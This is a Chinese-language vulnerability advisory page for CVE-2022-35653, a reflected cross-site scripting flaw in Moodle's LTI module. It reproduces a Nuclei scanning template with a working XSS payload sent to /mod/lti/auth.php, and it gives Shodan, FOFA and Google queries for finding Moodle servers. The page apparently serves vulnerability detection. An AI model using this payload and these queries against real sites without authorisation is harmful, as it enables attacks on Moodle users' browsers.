CVE-2022-35653: Moodle LTI module Reflected - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: Moodle LTI module | POC: 已公开

漏洞描述

A reflected XSS issue was identified in the LTI module of Moodle. The vulnerability exists due to insufficient sanitization of user-supplied data in the LTI module. A remote attacker can trick the victim to follow a specially crafted link and execute arbitrary HTML and script code in user's browser in context of vulnerable website to steal potentially sensitive information, change appearance of the web page, can perform phishing and drive-by-download attacks.

PoC代码[已公开]

id: CVE-2022-35653

info:
  name: Moodle LTI module Reflected - Cross-Site Scripting
  author: iamnoooob,pdresearch
  severity: medium
  description: |
    A reflected XSS issue was identified in the LTI module of Moodle. The vulnerability exists due to insufficient sanitization of user-supplied data in the LTI module. A remote attacker can trick the victim to follow a specially crafted link and execute arbitrary HTML and script code in user's browser in context of vulnerable website to steal potentially sensitive information, change appearance of the web page, can perform phishing and drive-by-download attacks.
  reference:
    - http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-72299
    - https://nvd.nist.gov/vuln/detail/CVE-2022-35653
    - https://bugzilla.redhat.com/show_bug.cgi?id=2106277
    - https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6MOKYVRNFNAODP2XSMGJ5CRDUZCZKAR3/
    - https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MTKUSFPSYFINSQFSOHDQIDVE6FWBEU6V/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-35653
    cwe-id: CWE-79
    epss-score: 0.77252
    epss-percentile: 0.98936
    cpe: cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: moodle
    product: moodle
    shodan-query:
      - title:"Moodle"
      - cpe:"cpe:2.3:a:moodle:moodle"
      - http.title:"moodle"
    fofa-query: title="moodle"
    google-query: intitle:"moodle"
  tags: cve,cve2022,moodle,xss

http:
  - raw:
      - |
        POST /mod/lti/auth.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        xxx"><img/src%3d'x'onerror%3dalert('document_domain')>=1

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<img/src='x'onerror=alert('document_domain')>"
          - "moodle-editor"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022061c9ccbc26c55f16396c50e0b162b75979d4bc97586a1abff1405d36b3f29ff7022100eadfa80d6215c760d8a74bf8cbfc3e430b4db6fffb41030806732f2df4a49cb9:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2022/CVE-2022-35653.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

Webmin /package-updates/update.cgi 命令执行漏洞（CVE-2022-36446） 无POC

CVE-2022-0342: Zyxel authentication bypass patch analysis POC

CVE-2022-0434: WordPress Page Views Count <2.4.15 - SQL Injection POC

CVE-2022-0540: Atlassian Jira - Authentication bypass in Seraph POC

CVE-2022-0656: uDraw <3.3.3 - Local File Inclusion POC

Webmin /package-updates/update.cgi 命令执行漏洞（CVE-2022-36446）无POC